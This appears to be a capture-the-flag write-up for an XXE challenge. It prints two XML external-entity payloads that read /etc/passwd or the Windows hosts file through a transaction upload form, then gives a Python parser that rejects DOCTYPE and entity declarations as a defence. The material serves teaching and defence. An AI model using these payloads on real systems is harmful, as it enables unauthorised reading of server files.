Challenges
XXE
Depending on which OS the application is running on, we can look for different paths. For instance, if the application is running on a Windows server, we can expect the file C:/Windows/System32/drivers/etc/hosts to exist. On the other hand, if the app is running on Linux, then we can expect the file /etc/passwd to exist.
Solution
If you visit the transaction page, you will see a form where you can upload transactions. This form requires an XML file. If we upload a simple XXE sample, the contents of the file paths specified in the external entity will be shown in the response.

If you are trying to get C:/Windows/System32/drivers/etc/hosts:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo
[
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts" >
]>
<foo>&xxe;</foo>
If you are trying to get /etc/passwd:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo
[
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>
You will find the flag in the response header.
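For the defender's side of this challenge, here is an added example (not the challenge application's own code) of how the transaction upload handler could parse XML without resolving the SYSTEM entity used above. It uses only Python's standard-library expat binding, refuses any document that declares a DOCTYPE, an entity or an external reference, and returns the leaf element text of a benign upload. The function and exception names (parse_safely, is_rejected, XXEAttemptRejected) and the sample transaction document are my own assumptions; the XXE sample is the Linux payload from the write-up.

```python
# Added example (not the challenge application's own code): a hardened XML
# parser for an upload endpoint like the transaction form above. Instead of
# resolving SYSTEM entities, it rejects any document that declares a DOCTYPE,
# an entity, or references an external entity. Standard library only.
import xml.parsers.expat


class XXEAttemptRejected(Exception):
    """Raised when an uploaded document tries to use a DTD or entities."""


def parse_safely(xml_bytes: bytes) -> dict:
    """Parse an uploaded XML document and return {leaf_tag: text}.

    Raises XXEAttemptRejected as soon as expat reports a DOCTYPE, an entity
    declaration or an external entity reference, so the file named in a
    SYSTEM entity is never opened.
    """
    parser = xml.parsers.expat.ParserCreate()
    leaves = {}
    stack = []  # one [tag, text_parts] entry per open element

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise XXEAttemptRejected(f"DOCTYPE {name!r} is not allowed")

    def forbid_entity(name, is_param, value, base, sysid, pubid, notation):
        raise XXEAttemptRejected(f"entity declaration {name!r} is not allowed")

    def forbid_external(context, base, sysid, pubid):
        raise XXEAttemptRejected(f"external reference {sysid!r} is not allowed")

    def start(name, attrs):
        stack.append([name, []])

    def chars(data):
        if stack:
            stack[-1][1].append(data)

    def end(name):
        tag, parts = stack.pop()
        text = "".join(parts).strip()
        if text:
            leaves[tag] = text

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = forbid_external
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars

    parser.Parse(xml_bytes, True)
    return leaves


def is_rejected(xml_bytes: bytes) -> bool:
    """True if parse_safely refuses the document (useful for logging/alerting)."""
    try:
        parse_safely(xml_bytes)
    except XXEAttemptRejected:
        return True
    return False


# Constructed sample inputs (assumed, not from the challenge): a benign
# transaction upload, and the Linux payload quoted in the write-up above.
BENIGN_UPLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<transactions>
  <transaction><to>alice</to><amount>10</amount></transaction>
</transactions>"""

XXE_UPLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>"""


if __name__ == "__main__":
    print(parse_safely(BENIGN_UPLOAD))  # {'to': 'alice', 'amount': '10'}
    print(is_rejected(XXE_UPLOAD))      # True
```

The document is rejected at the DOCTYPE declaration, before the entity is ever declared or dereferenced, which is the same approach the defusedxml package takes with its forbid_dtd option; rejecting the whole upload and logging it is also a cheap detection signal for the kind of probe this challenge uses.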